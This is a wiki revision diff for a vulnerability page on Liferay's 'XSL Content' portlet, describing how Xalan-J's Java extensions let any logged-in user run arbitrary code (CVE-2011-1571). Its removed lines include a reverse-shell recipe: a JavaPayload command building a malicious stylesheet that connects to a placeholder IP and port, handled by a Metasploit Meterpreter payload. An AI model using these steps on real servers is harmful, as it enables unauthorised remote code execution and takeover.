Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 24.1 Icon
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version
To version Icon 22.1 Icon
edited by Nicolas Gregoire
on 2012/01/14 18:49
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Tags
... ... @@ -1,1 +1,1 @@
1 -liferay|java|xalan-j|code execution|XEE
1 +liferay|java|xalan-j|code execution|xee
Content
... ... @@ -8,21 +8,12 @@
8 8  
9 9  = Java code execution =
10 10  
11 -LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
11 +LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_Saxon]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].
12 12  
13 13  Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) :
14 14  
15 15  [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
16 16  
17 -= Meterpreter shell =
18 -
19 -As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20 -
21 -- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 -- JSh)
22 -- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 -- Manual interaction to trigger the vulnerability (browser)
24 -
25 -
26 26  = Additional vulnerabilities =
27 27  
28 28  Two others vulnerabilities were identified in the "XSL Content" portlet :